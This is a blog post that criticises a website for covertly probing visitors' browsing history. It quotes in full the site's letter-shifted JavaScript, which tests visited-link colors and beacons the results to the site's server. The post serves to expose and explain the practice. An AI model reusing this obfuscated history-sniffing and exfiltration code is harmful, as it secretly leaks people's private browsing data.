How YouPorn Tries To Hide That It's Spying On Your Browsing History
from the what,-no-rot-13? dept
There's a fair bit of attention being paid to a Forbes article about some new research concerning how a bunch of websites, including YouPorn, are exploiting a simple security hole to see what other sites you've visited:How does it work? It's based on your browser changing the color of links you've already clicked on. A script on the site exploits a Web privacy leak to quickly check and see whether your browser reveals that the links to a host of other porn sites have been assigned the color "purple," meaning you've clicked them before.This isn't a huge surprise, but what I found most fascinating was how YouPorn sought to hide this bit of javascript by "encrypting" it. And by "encrypting" it, I mean switching letters one letter up in the alphabet. As Kashmir Hill explains:
The script on YouPorn’s site that checks a user’s history (which you can see for yourself by going to the site and checking out its html with “View Source”) looks like this:What's amazing is that anyone actually thought this was a worthwhile move. It's not that hard to "decrypt" and it's almost obvious to the naked eye because it's not too difficult to figure out how the "encryption" (and I use that word loosely) works just by noticing all the terms that end in /dpn. You'd think even a rot-13 would throw a few more people off the scent.<script type="text/javascript"> function ypol(){var k={0:"qpsoivc/dpn",1:"sfeuvcf/dpn", 2:"bevmugsjfoegjoefs/dpn",3:"ywjefpt/dpn",4:"uvcf9/dpn", 5:"yoyy/dpn",6:"nfhbqpso/dpn",7:"nfhbspujd/dpn", 8:"yibntufs/dpn",9:"bxfnqjsf/dpn",10:"sfbmjuzljoht/dpn", 11:"csb{{fst/dpn",12:"yuvcf/dpn",13:"cbohcspt2/dpn", 14:"gmjoh/dpn",15:"gsffpoft/dpn",16:"nzgsffqbztjuf/dpn", 17:"efcpobjscmph/dpn",18:"qbztfswf/dpn",19:"nbyqpso/dpn", 20:"wjefpt{/dpn",21:"bfco/ofu",22:"qpsopsbnb/dpn"}; var g=[];for(var m in k){var d=k[m]; var a="";for(var f=0;f<d.length;f++) {a+=String.fromCharCode(d.charCodeAt(f)-1)}var h=false; for(var j in {"http://":"","http://www.":""}) {var l=document.createElement("a"); l.href=j+a;document.getElementById("ol").appendChild(l); var e="";if(navigator.appName.indexOf("Microsoft")!=-1){e=l.currentStyle.color} else{e=document.defaultView.getComputedStyle(l,null).getPropertyValue("color")} if(e=="rgb(12, 34, 56)"||e=="rgb(12,34,56)"){h=true}}if(h){g.push(m)}} var b=(g instanceof Array)?g.join(","):"";var c=document.createElement("img"); c.src="http://ol.youporn.com/blank.gif?id="+b;document.getElementById("ol").appendChild(c)}ypol(); </script>That list of gibberish contains the sites that YouPorn is checking to see if you’ve visited, but disguises them with a bit o’ simple cryptography. Dial back each letter by one, so “qpsoivc/dpn”, for example, becomes “pornhub.com.”
Filed Under: browsers, encryption, history, javascript, spying
Companies: youporn